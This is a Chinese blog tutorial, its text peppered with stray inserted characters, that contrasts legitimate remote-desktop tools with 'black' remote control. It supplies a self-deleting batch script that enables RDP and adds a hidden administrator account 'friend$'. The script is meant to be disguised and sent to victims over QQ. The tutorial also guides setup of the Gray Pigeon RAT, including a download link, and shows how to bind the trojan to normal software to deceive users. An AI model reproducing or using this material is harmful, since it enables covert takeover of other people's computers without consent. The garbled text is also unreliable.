綠色遠(yuǎn)控
一新症、電腦自帶的遠(yuǎn)程桌面
Windows系統(tǒng)的電腦都會(huì)自帶遠(yuǎn)程桌面的功能择示,這里以windows7為例阳准。打開方法有以下兩種:
1.win+R調(diào)出運(yùn)行窗口————輸入mstsc源请;
2.win7的開始菜單直接搜索遠(yuǎn)程桌面榛丢,或者win8/10系統(tǒng)按住win+Q搜索遠(yuǎn)程桌面铲球。
輸入對(duì)方的ip地址即可進(jìn)行連接,輸入賬戶密碼即可以登錄主機(jī)使用晰赞。
局限性:這種方法雖然簡單穩(wěn)定稼病,但是前提是對(duì)方要在我的電腦————屬性————遠(yuǎn)程控制————勾選允許運(yùn)行任意版本的計(jì)算機(jī)連接(也就是開啟3389端口,后面會(huì)教你如何用命令開啟他人的3389端口)掖鱼;另外然走,這種連接只能用于局域網(wǎng)的主機(jī)。
優(yōu)點(diǎn):方便穩(wěn)定锨用,尤其是在校園網(wǎng)中丰刊,不需要撥號(hào)只要插上網(wǎng)線都可以連接。因?yàn)閷W(xué)校的網(wǎng)線都是在學(xué)校的內(nèi)網(wǎng)下增拥,屬于同一個(gè)局域網(wǎng)啄巧。
二、第三方軟件
除此之外掌栅,也可以用第三方軟件秩仆。比如:
1.向日葵:這款軟件是最近都非常火的一個(gè)遠(yuǎn)控軟件猾封,只要對(duì)方連網(wǎng)都可以進(jìn)行遠(yuǎn)程控制澄耍,界面設(shè)計(jì)好看,主要用于個(gè)人對(duì)家庭設(shè)備的集中管理。但是缺點(diǎn)也很明顯:必須在對(duì)方的電腦安裝向日葵服務(wù)端齐莲,且需要登錄你的向日葵賬號(hào)痢站,隱蔽性差!选酗;連接的時(shí)候需要輸入對(duì)方電腦的賬戶密碼阵难,或者對(duì)方向日葵的臨時(shí)密碼。當(dāng)然也是有優(yōu)點(diǎn)的:可以設(shè)置軟件僅以服務(wù)運(yùn)行芒填,這樣被控端在任務(wù)管理器中就發(fā)現(xiàn)不了你的遠(yuǎn)控軟件了呜叫;免費(fèi),且可以在手機(jī)上使用殿衰,非常方便朱庆。
所以說只要你有足夠的時(shí)間去接近和使用別人的電腦就可以輕松在上面安裝一個(gè)控制軟件,讓他成為你的肉雞闷祥。但是前提是除了親近的人娱颊,誰又會(huì)愿意讓你一個(gè)人玩他的電腦呢。凯砍。维蒙。
2.teamviewer:這款軟件主要用于商務(wù)活動(dòng),功能很強(qiáng)大果覆,主要用于遠(yuǎn)程會(huì)話。缺點(diǎn)是:完全不能隱蔽殖熟;雙方必須聯(lián)網(wǎng)局待;雙方必須都裝有teamviewer軟件。
一般來說菱属,網(wǎng)上能夠下載的官方遠(yuǎn)控軟件都是跟上述的兩個(gè)大同小異钳榨。作為個(gè)人的設(shè)備集中管理非常方便好用,但是不能作為攻擊工具去入侵別人的電腦纽门。下面將會(huì)介紹幾款黑色遠(yuǎn)控薛耻!
黑色遠(yuǎn)控
一、遠(yuǎn)程開啟3389.
將以下這段代碼復(fù)制到一個(gè)記事本中重命名為control.bat(查看后綴名赏陵,在文件夾選項(xiàng)中開啟)
@echo off echo Windows Registry Editor Version 5.00>>3389.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>3389.reg echo "fDenyTSConnections"=dword:00000000>>3389.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>3389.reg echo "PortNumber"=dword:00000d3d>>3389.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]>>3389.reg echo "PortNumber"=dword:00000d3d>>3389.reg regedit /s 3389.reg net user friend$ hack /add net localgroup administrators friend$ /add del 3389.reg del control.bat
然后偽裝圖標(biāo)等等之后通過qq發(fā)給對(duì)方饼齿,對(duì)方雙擊后,文件會(huì)自動(dòng)運(yùn)行并且刪除蝙搔,然后要是你們是局域網(wǎng)的話就可以開始愉快的遠(yuǎn)控了缕溉。
二、黑產(chǎn)遠(yuǎn)控軟件的使用
灰鴿子
步驟:
先下載灰鴿子軟件,大家沒有的可以下載灰鴿子軟件的
打開后灰鴿子,我們先點(diǎn)擊ftp更新我們的動(dòng)態(tài)域名
更新成功在打開配置服務(wù)端,寫上更新好的域名
這里是運(yùn)行后服務(wù)端釋放的目錄,大家根據(jù)自己的要求來寫
這個(gè)是選擇用什么進(jìn)程的名字,我這個(gè)是使用ie進(jìn)程
配置好后,就是有一個(gè)Server.exe,運(yùn)行后就可以在主控端里面看到了
主控端顯示的界面就是這樣的
1.下載地址:http://pan.baidu.com/s/1jHJGoHg
首先配置服務(wù)端吃型,IP地址填自己的電腦所在的能上網(wǎng)的地址证鸥。一般是公網(wǎng)地址。不知道的可以按照win+R————cmd————ipconfig查看。
?生成服務(wù)端枉层,發(fā)給你的肉雞泉褐,他雙擊后你就可以進(jìn)行控制了。
但是這種服務(wù)端是不是看起來很容易被識(shí)破鸟蜡,發(fā)給人家了誰會(huì)這么傻去雙擊啊膜赃。所以說,這個(gè)時(shí)候我們應(yīng)該給服務(wù)端做一個(gè)捆綁矩欠,也就是加殼财剖。自己去網(wǎng)上下載一個(gè)捆綁工具,這里不做演示癌淮。
打開捆綁工具躺坟,將正常的軟件作為主文件,木馬也就是我們的服務(wù)端作為捆綁文件乳蓄,進(jìn)行捆綁命名咪橙。比如說我這個(gè)取一個(gè)迷惑人的名字,別人打開之后就會(huì)運(yùn)行捆綁的兩個(gè)軟件虚倒,不會(huì)被懷疑了美侦。
但是綜上所述,雖然黑控軟件千千萬魂奥,但是現(xiàn)在的殺毒軟件都做得非常的好菠剩,你的服務(wù)端一被接受就會(huì)被殺毒軟件干掉,所以說做到免殺是一個(gè)非常關(guān)鍵的一環(huán)耻煤。在下一個(gè)博客具壮,我們將會(huì)來探討如何做到免殺!繞過安全狗哈蝇。
